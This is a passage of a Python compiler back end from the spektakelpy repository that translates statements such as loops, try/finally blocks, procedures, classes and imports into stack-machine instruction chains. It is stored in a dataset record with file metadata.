chain\n\n def emit_break(self, on_error, chain=None):\n \"\"\"\n Emits code for a break statement.\n :param chain: The chain to emit the code to. If this is omitted, a new chain will be created.\n :param on_error: The chain to jump to in case of an error.\n :return: Either the given chain, or the newly created one (if no chain was given).\n \"\"\"\n\n if chain is None:\n chain = Chain()\n\n # Walk over the block stack (\"outwards\"), until you hit either an exception block or a loop:\n for entry in self._blocks:\n if isinstance(entry, BlockStack.ExceptionBlock):\n chain.append_update(ExceptionReference(), terms.NewJumpError(VBreakError), on_error=on_error)\n chain.append_jump(entry.finallyChain)\n return chain\n elif isinstance(entry, BlockStack.LoopBlock):\n chain.append_update(ExceptionReference(), terms.CNone(), on_error=on_error)\n chain.append_jump(entry.successorChain)\n return chain\n\n raise AssertionError(\"This code location must never be reached,\"\n \" because break statements cannot be emitted outside loops!\")\n\n def emit_continue(self, on_error, chain=None):\n \"\"\"\n Emits code for a continue statement.\n :param chain: The chain to emit the code to. If this is omitted, a new chain will be created.\n :param on_error: The chain to jump to in case of an error.\n :return: Either the given chain, or the newly created one (if no chain was given).\n \"\"\"\n\n if chain is None:\n chain = Chain()\n\n # Walk over the block stack (\"outwards\"), until you hit either an exception block or a loop:\n for entry in self._blocks:\n if isinstance(entry, BlockStack.ExceptionBlock):\n chain.append_update(ExceptionReference(), terms.NewJumpError(VContinueError), on_error=on_error)\n chain.append_jump(entry.finallyChain)\n return chain\n elif isinstance(entry, BlockStack.LoopBlock):\n chain.append_update(ExceptionReference(), terms.CNone(), on_error=on_error)\n chain.append_jump(entry.headChain)\n return chain\n\n raise AssertionError(\"This code location must never be reached,\"\n \" because break statements cannot be emitted outside loops!\")\n\n def _emit_procedure(self, chain, name, argnames, body, dec, on_error):\n \"\"\"\n Emits code for a procedure declaration.\n :param name: The AST node representing the name of the procedure.\n :param argnames: A tuple of AST nodes representing the argument names of the procedure.\n :param body: The AST node representing the body of the procedure.\n :param dec:\n :param on_error:\n :return: A pair (v, c), where v is a Term representing the procedure object and c is the chain to which code\n following the procedure definition can be appended.\n \"\"\"\n\n bodyBlock = Chain()\n exitBlock = Chain()\n\n num_args = len(argnames)\n\n self._blocks.push(BlockStack.FunctionBlock(0))\n\n # Declare the function arguments as local variables:\n for aname in argnames:\n self.declare_pattern(bodyBlock, aname, on_error)\n\n body = self.translate_statement(bodyBlock, body, dec, exitBlock)\n body.append_pop()\n\n exitBlock.append_pop()\n\n # TODO (later): The function definition might be nested in another one.\n # Since it might \"escape\" the enclosing function, the variables that are shared between\n # the functions cannot be allocated on the stack.\n # Those variables that are shared must be allocated in a \"Heap frame\", the pointer to which\n # is part of the Function object that is constructed (IT CANNOT BE PASSED AS AN ARGUMENT!\n # REASON: The function object is not being called here, but later,\n # by some other code that receives the function object!)\n # The compilation of the inner function\n # must thus map the shared variables to offsets in the heap frame.\n # --> For now we should just *detect* nonlocal variables and raise a NotImplementedError\n\n f = terms.NewProcedure(num_args, body.compile())\n\n self._blocks.pop()\n\n if name is None:\n return f, chain\n else:\n name = self.declare_pattern(chain, name, on_error)\n chain = chain.append_update(name, f, on_error)\n return name, chain\n\n def translate_statement(self, chain, node, dec, on_error):\n \"\"\"\n Translates a statement into a StackProgram.\n :param chain: The chain to which to append the translation of the statement.\n :param node: An AST node representing a Statement.\n :param dec: A dict mapping AST nodes to decorations.\n :param on_error: The chain to jump to in case an (unhandled) error occurs during the execution of the translated\n statement.\n :return: A Chain object that the instructions resulting from the translation of the statement will jump to\n after completing the execution of the statement.\n \"\"\"\n\n if isinstance(node, Pass):\n pass\n elif isinstance(node, ExpressionStatement):\n _, chain = self.translate_expression(chain, node.expression, dec, on_error)\n # The previous line generated code for any side effects of the expression.\n # We do not really need to use the expression itself,\n # because its evaluation result is not to be bound to anything.\n return chain\n elif isinstance(node, Assignment):\n chain = self.emit_assignment(chain, node.target, dec, node.value, on_error)\n return chain\n elif isinstance(node, Block):\n for s in node.children:\n chain = self.translate_statement(chain, s, dec, on_error)\n return chain\n elif isinstance(node, Return):\n if node.value is not None:\n r, chain = self.translate_expression(chain, node.value, dec, on_error)\n chain.append_update(ReturnValueReference(), r, on_error)\n self.emit_return(on_error, chain)\n return Chain()\n elif isinstance(node, Raise):\n if node.value is None:\n found = False\n # Walk over the block stack (\"outwards\") to find the exception block this re-raise is contained in.\n for entry in self._blocks:\n if isinstance(entry, BlockStack.ExceptionBlock):\n chain.append_update(ExceptionReference(), terms.Read(entry.exceptionVariable), on_error=on_error)\n found = True\n if not found:\n raise AssertionError(\n \"A raise statement without an expression should not occur outside a try block!\")\n else:\n e, chain = self.translate_expression(chain, node.value, dec, on_error)\n chain.append_update(ExceptionReference(), e, on_error)\n chain.append_jump(on_error)\n return Chain()\n elif isinstance(node, Break):\n self.emit_break(on_error, chain)\n return Chain()\n elif isinstance(node, Continue):\n self.emit_continue(on_error, chain)\n return Chain()\n elif isinstance(node, Conditional):\n consequence = Chain()\n alternative = Chain()\n successor = Chain()\n condition, chain = self.translate_expression(chain, node.condition, dec, on_error)\n chain.append_guard({condition: consequence, ~condition: alternative}, on_error)\n consequence = self.translate_statement(consequence, node.consequence, dec, on_error)\n consequence.append_jump(successor)\n alternative = self.translate_statement(alternative, node.consequence, dec, on_error)\n alternative.append_jump(successor)\n return successor\n elif isinstance(node, While):\n head = Chain()\n body = Chain()\n successor = Chain()\n chain.append_jump(head)\n condition, head = self.translate_expression(head, node.condition, dec, on_error)\n head.append_guard({condition: body, ~condition: successor}, on_error)\n self._blocks.push(BlockStack.LoopBlock(head, successor))\n body = self.translate_statement(body, node.body, dec, on_error)\n self._blocks.pop()\n body.append_jump(head)\n return successor\n elif isinstance(node, For):\n \"\"\"\n A for loop is syntactic sugar for:\n it = xs.__iter__()\n while True:\n try:\n pattern = it.__next__()\n except StopIteration:\n break\n \n \"\"\"\n\n stopper = Chain()\n body = Chain()\n successor = Chain()\n\n iterable, chain = self.translate_expression(chain, node.iterable, dec, on_error)\n callee, chain = self.translate_expression(chain, Attribute(iterable, \"__iter__\"), dec, on_error)\n iterator, chain = self.emit_call(chain, callee, [], on_error)\n\n self.declare_pattern(chain, node.pattern, on_error)\n\n chain.append_jump(body)\n\n callee, body = self.translate_expression(body, Attribute(iterator, \"__next__\"), dec, on_error)\n element, body = self.emit_call(body, callee, [], stopper)\n\n s = terms.IsInstance(terms.Read(ExceptionReference()), TStopIteration.instance)\n stopper.append_guard({s: successor, ~s: on_error}, on_error)\n successor.append_update(ExceptionReference(), terms.CNone(), on_error)\n\n head = self.emit_assignment(chain, node.pattern, dec, element, on_error)\n\n self._blocks.push(BlockStack.LoopBlock(head, successor))\n self.translate_statement(body, node.body, dec, on_error)\n self._blocks.pop()\n body.append_jump(body)\n return successor\n elif isinstance(node, Try):\n\n body = Chain()\n handler = Chain()\n restoration = Chain()\n finally_head = Chain()\n successor = Chain()\n exception = self.declare_name(body, None, on_error)\n self._blocks.push(BlockStack.ExceptionBlock(exception, finally_head))\n self.translate_statement(body, node.body, dec, handler)\n body.append_jump(finally_head)\n\n # As the very first step, the exception variable of the task is cleared:\n handler.append_update(exception, terms.Read(ExceptionReference()), on_error)\n handler.append_update(ExceptionReference(), terms.CNone(), on_error)\n\n for h in node.handlers:\n sc = Chain()\n hc = Chain()\n handler, t = self.translate_expression(handler, h.type, dec, finally_head)\n match = terms.IsInstance(exception, t)\n handler.append_guard({match: hc, ~match: sc}, finally_head)\n\n self._decl2ref[h] = exception\n hc = self.translate_statement(hc, h.body, dec, finally_head)\n hc.append_jump(finally_head)\n\n handler = sc\n\n # If none of the handlers apply, restore the exception variable and jump to the finally:\n handler.append_jump(restoration)\n\n restoration.append_update(ExceptionReference(), terms.Read(exception), on_error)\n restoration.append_update(exception, terms.CNone(), on_error)\n restoration.append_jump(finally_head)\n\n self._blocks.pop()\n\n if node.final is not None:\n # The finally clause first stashes the current exception and return value away:\n returnvalue = self.declare_name(finally_head, None, on_error)\n finally_head.append_update(exception, terms.Read(ExceptionReference()), on_error)\n finally_head.append_update(ExceptionReference(), terms.CNone(), on_error)\n finally_head.append_update(returnvalue, terms.Read(ReturnValueReference()), on_error)\n finally_head.append_update(ReturnValueReference(), terms.CNone(), on_error)\n # Then it executes its body:\n finally_foot = self.translate_statement(finally_head, node.final, dec, on_error)\n # Then it restores the stashed exception and return value:\n finally_foot.append_update(ReturnValueReference(), terms.Read(returnvalue), on_error)\n finally_foot.append_update(ExceptionReference(), terms.Read(exception), on_error)\n finally_foot.append_update(returnvalue, terms.CNone(), on_error)\n else:\n finally_foot = finally_head\n\n # Then it decides where to jump to, depending on the exception that caused the finally to be entered:\n e = terms.Read(ExceptionReference())\n condition_return = terms.IsInstance(e, types.TReturnException())\n condition_break = terms.IsInstance(e, types.TBreakException())\n condition_continue = terms.IsInstance(e, types.TContinueException())\n\n condition_exception = terms.IsInstance(e, types.TException()) & ~condition_break & ~condition_continue & ~condition_return\n condition_termination = terms.Comparison(ComparisonOperator.IS, e, terms.CNone)\n finally_foot.append_guard({condition_termination: successor,\n condition_return: self.emit_return(on_error),\n condition_break: self.emit_break(on_error),\n condition_continue: self.emit_continue(on_error),\n condition_exception: on_error,\n }, on_error)\n\n return successor\n elif isinstance(node, VariableDeclaration):\n self.declare_pattern(chain, node.pattern, on_error)\n if node.expression is not None:\n chain = self.emit_assignment(chain, node.pattern, dec, node.expression, on_error, declaring=True)\n return chain\n elif isinstance(node, ProcedureDefinition):\n if not isinstance(self._blocks[-1], (BlockStack.ClassBlock, BlockStack.ModuleBlock)):\n raise NotImplementedError(\"Code generation for procedure definitions on levels other than module level \"\n \"or class level has not been implemented yet!\")\n\n _, chain = self._emit_procedure(chain, node.name, node.argnames, node.body, dec, on_error)\n return chain\n\n elif isinstance(node, PropertyDefinition):\n\n getter, chain = self._emit_procedure(chain, None, [\"self\"], node.getter, dec, on_error)\n setter, chain = self._emit_procedure(chain, None, [\"self\", node.vname], node.setter, dec, on_error)\n\n # A property is a special kind of descriptor (see https://docs.python.org/3/glossary.html#term-descriptor).\n # A property object does not have private data. It only holds the getter and the setter. Both those\n # methods take an instance as argument and then read/write that.\n\n name = self.declare_pattern(chain, node.name, on_error)\n chain = chain.append_update(name, terms.NewProperty(getter, setter), on_error)\n return name, chain\n\n elif isinstance(node, ClassDefinition):\n if not isinstance(self._blocks[-1], BlockStack.ModuleBlock):\n # This would be probelamtic, because the type might incorporate local variables from the current function\n # stack. This is difficult to implement for the same reason that nested function declarations are.\n raise NotImplementedError(\"Code generation for class definitions on levels other than module level \"\n \"has not been implemented yet!\")\n\n self._blocks.push(BlockStack.ClassBlock(0))\n\n name = self.declare_pattern(chain, node.name, on_error)\n\n super_classes = []\n for s_expression in node.bases:\n s_term = self.translate_expression(chain, s_expression, dec, on_error)\n super_classes.append(s_term)\n\n # We create a new Namespace object and put it into the stack frame.\n chain = chain.append_push()\n chain = chain.append_update(FrameReference(0), terms.NewNamespace(), exit)\n\n chain = self.translate_statement(chain, node.body, dec, on_error)\n\n chain = chain.append_update(name, terms.NewClass(super_classes, terms.Read(FrameReference(0))), on_error)\n chain = chain.append_pop()\n\n self._blocks.pop()\n\n return chain\n\n elif isinstance(node, (ImportNames, ImportSource)):\n\n ms = check_type(dec[node.source], ModuleSpecification)\n subnames = list(map(str, node.source.identifiers[1:]))\n\n if isinstance(node, ImportSource):\n mapping = {}\n if node.alias is None:\n if not (len(node.source.Identifiers) == 1):\n raise NotImplementedError(\"Code generation for a source import that contains dots has not been implemented!\")\n name = node.source.Identifiers[0]\n else:\n name = node.alias\n elif isinstance(node, ImportNames):\n if node.wildcard:\n raise NotImplementedError(\"Compilation of wildcard imports has not been implemented!\")\n mapping = {alias.name: name.name for name, alias in node.aliases.items()}\n name = None\n else:\n raise NotImplementedError(\"Code generation for nodes of type {}\"\n \" has not been implemented!\".format(type(node)))\n\n return self.emit_import(chain, ms, subnames, name, mapping, on_error)\n else:\n raise NotImplementedError()\n\n def emit_preamble(self):\n \"\"\"\n Emits code that is to run once at the beginning of execution.\n :return: A Chain object.\n \"\"\"\n\n \"\"\" We generate code for this:\n \n var mcv = {}\n\n def ___import___(location):\n try:\n return mcv[location]\n except KeyError:\n m = ___call___(location, [Module()])\n mcv[location] = m\n return m\n \n del mcv\n \"\"\"\n\n preamble = Chain()\n panic = Chain()\n\n d = self.declare_name(preamble, None, panic)\n d = AbsoluteFrameReference(0, 0, d.index)\n preamble.append_update(TRef(d), NewDict(), panic)\n\n self._blocks.push(BlockStack.FunctionBlock(0))\n imp_code = Chain()\n load1 = Chain()\n load2 = Chain()\n exit = Chain()\n l = self.declare_name(imp_code, None, panic)\n imp_code.append_push(CTerm(VDict.get), [Read(TRef(d)), Read(TRef(l))], load1)\n imp_code.append_pop()\n load1.append_push(Read(TRef(l)), [], exit)\n error = terms.Comparison(ComparisonOperator.NEQ, terms.Read(TRef(ExceptionReference())), terms.CNone())\n load1.append_guard({error: exit, negate(error): load2}, panic)\n load2.append_push(CTerm(VDict.set), [Read(TRef(d)), Read(TRef(l)), Read(TRef(ReturnValueReference()))], panic)\n load2.append_jump(exit)\n exit.append_pop()\n self._blocks.pop()\n\n self._import_procedure = VProcedure(1, imp_code.compile())\n\n return preamble\n\n def translate_module(self, nodes, dec):\n \"\"\"\n Generates code for an entire module.\n :param nodes: An iterable of statements that represent the code of the module.\n :param dec: A dict mapping AST nodes to decorations.\n :return: A Chain object.\n \"\"\"\n\n # We assume that somebody put a fresh frame on the stack.\n\n block = Chain()\n entry = block\n exit = Chain()\n\n # We create a new Namespace object and put it into the stack frame.\n block.append_update(TRef(FrameReference(0)), terms.NewNamespace(), exit)\n\n # The code of a module assumes that there is 1 argument on the current stack frame, which is the Namespace object\n # that is to be populated. All allocations of local variables must actually be members of that Namespace object.\n self._blocks.push(BlockStack.ModuleBlock(0))\n\n # Import the builtin names:\n for bms in self._builtin:\n block = self.emit_import(block, bms, [], None, {s: s for s in bms.symbols}, exit)\n\n # We execute the module code completely, which populates that namespace.\n for node in nodes:\n block = self.translate_statement(block, node, dec, exit)\n\n # Return a Module object. The preamble will store it somewhere.\n block.append_update(TRef(ReturnValueReference()), terms.NewModule(terms.Read(TRef(FrameReference(0)))), exit)\n\n block.append_pop()\n exit.append_pop()\n\n self._blocks.pop()\n\n return entry\n\n def translate(self, nodes, dec):\n \"\"\"\n Translate a standalone program.\n :param nodes: An iterable of statements that represent the code of the main module.\n :param dec: A dict mapping AST nodes to decorations.\n :return: A Chain object.\n \"\"\"\n self._blocks.push(BlockStack.ModuleBlock(0))\n code = self.emit_preamble() + self.translate_module(nodes, dec)\n self._blocks.pop()\n return code", "repo_name": "gfhcs/spektakelpy", "sub_path": "lang/spek/dynamic.py", "file_name": "dynamic.py", "file_ext": "py", "file_size_in_byte": 55489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "engine.functional.terms.UnaryOperation", "line_number": 22, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 22, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryOperator.NOT", "line_number": 22, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.UnaryOperator", "line_number": 22, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 54, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 58, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 89, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 89, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 89, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 89, "usage_type": "name"}, {"api_name": "ast.Launch", "line_number": 89, "usage_type": "name"}, {"api_name": "io.StringIO", "line_number": 91, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 120, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 132, "usage_type": "name"}, {"api_name": "engine.functional.terms.CBool", "line_number": 145, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 145, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 159, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 168, "usage_type": "name"}, {"api_name": "ast.Launch", "line_number": 183, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 211, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Pop", "line_number": 212, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 221, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Update", "line_number": 223, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 224, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 226, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 227, "usage_type": "name"}, {"api_name": "engine.tasks.instructions.Push", "line_number": 229, "usage_type": "call"}, {"api_name": "ast.Launch", "line_number": 230, "usage_type": "name"}, {"api_name": "ast.Launch", "line_number": 232, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.Guard", "line_number": 239, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.StackProgram", "line_number": 242, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 250, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 251, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 252, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 253, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 254, "usage_type": "call"}, {"api_name": "lang.translator.Translator", "line_number": 294, "usage_type": "name"}, {"api_name": "ast.Identifier", "line_number": 334, "usage_type": "argument"}, {"api_name": "ast.ProcedureDefinition", "line_number": 336, "usage_type": "argument"}, {"api_name": "ast.PropertyDefinition", "line_number": 338, "usage_type": "argument"}, {"api_name": "ast.ClassDefinition", "line_number": 340, "usage_type": "argument"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 354, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 360, "usage_type": "call"}, {"api_name": "engine.functional.reference.NameReference", "line_number": 361, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 362, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 362, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 362, "usage_type": "name"}, {"api_name": "ast.Identifier", "line_number": 380, "usage_type": "argument"}, {"api_name": "ast.Identifier", "line_number": 395, "usage_type": "argument"}, {"api_name": "ast.AssignableExpression", "line_number": 397, "usage_type": "argument"}, {"api_name": "ast.Identifier", "line_number": 423, "usage_type": "argument"}, {"api_name": "engine.functional.terms.TRef", "line_number": 427, "usage_type": "call"}, {"api_name": "ast.Tuple", "line_number": 429, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Project", "line_number": 433, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 433, "usage_type": "name"}, {"api_name": "engine.functional.terms.CInt", "line_number": 433, "usage_type": "call"}, {"api_name": "ast.Projection", "line_number": 434, "usage_type": "argument"}, {"api_name": "ast.Attribute", "line_number": 435, "usage_type": "call"}, {"api_name": "ast.Attribute", "line_number": 438, "usage_type": "argument"}, {"api_name": "engine.functional.terms.StoreAttrCase", "line_number": 466, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 466, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 468, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 468, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 468, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 469, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 469, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 469, "usage_type": "attribute"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 484, "usage_type": "call"}, {"api_name": "ast.AssignableExpression", "line_number": 491, "usage_type": "argument"}, {"api_name": "util.check_type", "line_number": 514, "usage_type": "call"}, {"api_name": "modules.ModuleSpecification", "line_number": 514, "usage_type": "argument"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 518, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 519, "usage_type": "call"}, {"api_name": "engine.tasks.instructions.ProgramLocation", "line_number": 519, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 521, "usage_type": "call"}, {"api_name": "engine.functional.terms.Lookup", "line_number": 524, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 524, "usage_type": "name"}, {"api_name": "engine.functional.terms.CString", "line_number": 524, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 527, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 530, "usage_type": "call"}, {"api_name": "engine.functional.terms.Lookup", "line_number": 530, "usage_type": "call"}, {"api_name": "engine.functional.terms.CString", "line_number": 530, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 548, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 548, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewTypeError", "line_number": 548, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 548, "usage_type": "name"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 550, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 550, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.EQ", "line_number": 550, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 550, "usage_type": "name"}, {"api_name": "engine.functional.terms.NumArgs", "line_number": 550, "usage_type": "call"}, {"api_name": "engine.functional.terms.CInt", "line_number": 550, "usage_type": "call"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 556, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.EQ", "line_number": 556, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 556, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 556, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 560, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 561, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 561, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 561, "usage_type": "name"}, {"api_name": "ast.Constant", "line_number": 573, "usage_type": "argument"}, {"api_name": "engine.functional.terms.CBool", "line_number": 576, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 576, "usage_type": "name"}, {"api_name": "engine.functional.terms.CString", "line_number": 578, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 578, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 580, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 580, "usage_type": "name"}, {"api_name": "engine.functional.terms.CInt", "line_number": 582, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 582, "usage_type": "name"}, {"api_name": "engine.functional.terms.CFloat", "line_number": 584, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 584, "usage_type": "name"}, {"api_name": "ast.Identifier", "line_number": 588, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Read", "line_number": 589, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 589, "usage_type": "call"}, {"api_name": "ast.Attribute", "line_number": 590, "usage_type": "argument"}, {"api_name": "engine.functional.terms.LoadAttrCase", "line_number": 594, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 594, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 596, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 596, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 596, "usage_type": "attribute"}, {"api_name": "ast.Call", "line_number": 610, "usage_type": "argument"}, {"api_name": "ast.Launch", "line_number": 618, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Read", "line_number": 626, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 626, "usage_type": "name"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 626, "usage_type": "call"}, {"api_name": "ast.Await", "line_number": 628, "usage_type": "argument"}, {"api_name": "engine.functional.terms.UnaryPredicateTerm", "line_number": 631, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 631, "usage_type": "name"}, {"api_name": "engine.functional.terms.UnaryPredicate", "line_number": 631, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 635, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.EQ", "line_number": 635, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 635, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 635, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 639, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 640, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 640, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 641, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 641, "usage_type": "name"}, {"api_name": "ast.Projection", "line_number": 643, "usage_type": "argument"}, {"api_name": "ast.Attribute", "line_number": 646, "usage_type": "call"}, {"api_name": "ast.UnaryOperation", "line_number": 648, "usage_type": "argument"}, {"api_name": "engine.functional.terms.UnaryOperation", "line_number": 649, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 649, "usage_type": "name"}, {"api_name": "ast.ArithmeticBinaryOperation", "line_number": 650, "usage_type": "argument"}, {"api_name": "engine.functional.terms.ArithmeticBinaryOperation", "line_number": 653, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 653, "usage_type": "name"}, {"api_name": "ast.Comparison", "line_number": 654, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 655, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 655, "usage_type": "name"}, {"api_name": "ast.BooleanBinaryOperation", "line_number": 658, "usage_type": "argument"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator.AND", "line_number": 669, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator", "line_number": 669, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 670, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 670, "usage_type": "name"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator.OR", "line_number": 671, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.BooleanBinaryOperator", "line_number": 671, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 672, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 672, "usage_type": "name"}, {"api_name": "engine.functional.terms.CBool", "line_number": 674, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 674, "usage_type": "name"}, {"api_name": "engine.functional.terms.BooleanBinaryOperation", "line_number": 679, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 679, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 679, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 681, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 681, "usage_type": "name"}, {"api_name": "ast.Tuple", "line_number": 682, "usage_type": "argument"}, {"api_name": "engine.functional.terms.NewTuple", "line_number": 683, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 683, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 701, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewJumpError", "line_number": 701, "usage_type": "call"}, {"api_name": "engine.functional.values.VReturnError", "line_number": 701, "usage_type": "argument"}, {"api_name": "engine.functional.terms", "line_number": 701, "usage_type": "name"}, {"api_name": "engine.functional.terms.TRef", "line_number": 708, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 708, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 708, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 708, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 727, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewJumpError", "line_number": 727, "usage_type": "call"}, {"api_name": "engine.functional.values.VBreakError", "line_number": 727, "usage_type": "argument"}, {"api_name": "engine.functional.terms", "line_number": 727, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 731, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 731, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 731, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 752, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewJumpError", "line_number": 752, "usage_type": 